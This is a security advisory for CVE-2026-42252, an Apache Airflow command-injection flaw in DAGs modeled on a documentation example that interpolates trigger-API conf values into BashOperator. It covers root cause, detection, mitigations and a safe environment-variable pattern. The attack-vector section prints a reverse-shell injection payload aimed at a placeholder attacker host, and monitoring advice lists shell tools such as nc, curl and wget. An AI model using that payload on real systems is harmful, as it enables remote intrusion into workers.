CVE-2026-42252: Apache Airflow RCE Vulnerability

CVE-2026-42252 Overview

CVE-2026-42252 affects Apache Airflow deployments whose DAG code was modeled on a vulnerable documentation example. The official documentation at core-concepts/dag-run.html showed a BashOperator(bash_command="echo value: {{ dag_run.conf['conf1'] }}") pattern without shell-quoting or sanitization warnings. Authenticated users with Dag.can_trigger permission could inject shell metacharacters through the conf field of the trigger API. The injected payload reaches os.exec on the worker, enabling arbitrary command execution. This issue belongs to the same class as the prior CVE-2025-50213 and CVE-2025-27018 documentation-pattern fixes. The vulnerability is tracked under [CWE-1336] (Improper Neutralization of Special Elements Used in a Template Engine).

Critical Impact

Authenticated trigger users can execute arbitrary commands on Airflow workers when DAG authors copied the pre-correction documentation example verbatim.

Affected Products

• Apache Airflow deployments using DAG code modeled on the pre-correction core-concepts/dag-run.html example
• Multi-team Airflow deployments where users hold Dag.can_trigger permission
• Hosted Airflow offerings exposing the trigger API to authenticated users

Discovery Timeline

• 2026-06-01 - CVE-2026-42252 published to NVD
• 2026-06-02 - Last updated in NVD database

Technical Details for CVE-2026-42252

Vulnerability Analysis

The root issue is a template-engine injection pattern propagated through official documentation. The Airflow docs presented a BashOperator example that interpolates dag_run.conf['conf1'] directly into a shell command string. Jinja templating replaces the placeholder with the raw user-supplied value before the shell parses the result. Any DAG built on this pattern accepts attacker-controlled input from the trigger API's conf payload and forwards it unsanitized to the worker shell. The exposure depends on a permission boundary that is routinely crossed in multi-team environments: holders of Dag.can_trigger are normally treated as low-privilege operational users, not as code-execution-equivalent identities.

Root Cause

The documentation example did not apply shell quoting or warn that dag_run.conf values are untrusted input. DAG authors copying the pattern produce a BashOperator whose bash_command is reconstructed at template-render time, mixing literal command text with attacker-controlled strings. Apache Airflow PR 64129 corrects the example to include explicit shell-quoting and a safety caveat, and the corrected docs ship with apache-airflow 3.2.2.

Attack Vector

An authenticated user with Dag.can_trigger on an affected DAG calls the trigger API and supplies a conf value containing shell metacharacters. A payload such as "; bash -i >& /dev/tcp/<attacker>/9999 0>&1; #" terminates the echo command, executes an attacker-controlled command, and comments out the trailing literal. The injected command runs in the worker process with the privileges of the Airflow worker, providing a foothold inside the orchestration plane. See the Apache Airflow PR 64129 for the documentation correction details.

// No verified exploit code is published. The vulnerability is described in prose above; refer to PR 64129 for the corrected pattern and to the Apache mailing list thread for advisory context.

Detection Methods for CVE-2026-42252

Indicators of Compromise

• Trigger API requests where the conf JSON payload contains shell metacharacters such as ;, |, &, backticks, or $(.
• Worker process logs showing unexpected child processes spawned from BashOperator tasks, particularly shells with network sockets.
• Outbound network connections from Airflow worker hosts to unfamiliar IP addresses on high-numbered ports.

Detection Strategies

• Audit DAG source code for BashOperator instances whose bash_command interpolates dag_run.conf, params, or other user-controllable Jinja variables without shlex.quote or equivalent escaping.
• Inspect Airflow audit logs and dag_run records for conf payloads containing suspicious tokens, then correlate with worker task logs.
• Monitor Airflow REST API access logs for trigger calls originating from accounts that do not normally invoke them.

Monitoring Recommendations

• Forward Airflow webserver, scheduler, and worker logs to a centralized analytics platform and alert on shell-metacharacter patterns in conf fields.
• Baseline the set of processes a worker spawns per DAG and alert on deviations such as bash -i, nc, curl, or wget invocations.
• Track egress connections from worker hosts and flag any session to non-allowlisted destinations.

How to Mitigate CVE-2026-42252

Immediate Actions Required

• Upgrade to apache-airflow 3.2.2 or later to ingest the corrected documentation and align local DAG patterns with the safe example.
• Review every BashOperator in production for untrusted Jinja interpolation and refactor to pass values through environment variables or shlex.quote.
• Restrict Dag.can_trigger to identities that are already trusted with code-execution-equivalent access on the worker.

Patch Information

The fix is documentation-level and ships in apache-airflow 3.2.2 via apache/airflow PR 64129. The corrected example demonstrates shell-quoting and adds an explicit safety caveat. Refer to the Apache mailing list discussion for advisory context.

Workarounds

• Replace inline Jinja interpolation with environment variables: pass dag_run.conf values via the env argument of BashOperator and reference them as "$CONF1" inside the command.
• Wrap any required interpolation with {{ dag_run.conf['conf1'] | shell_quote }} or pre-process the value in a Python callable before passing it to the shell.
• Prefer PythonOperator or KubernetesPodOperator with parameterized arguments over BashOperator when handling externally supplied input.

# Configuration example: safe BashOperator pattern using env vars
# task = BashOperator(
#     task_id="echo_safe",
#     bash_command='echo "value: $CONF1"',
#     env={"CONF1": "{{ dag_run.conf['conf1'] }}"},
# )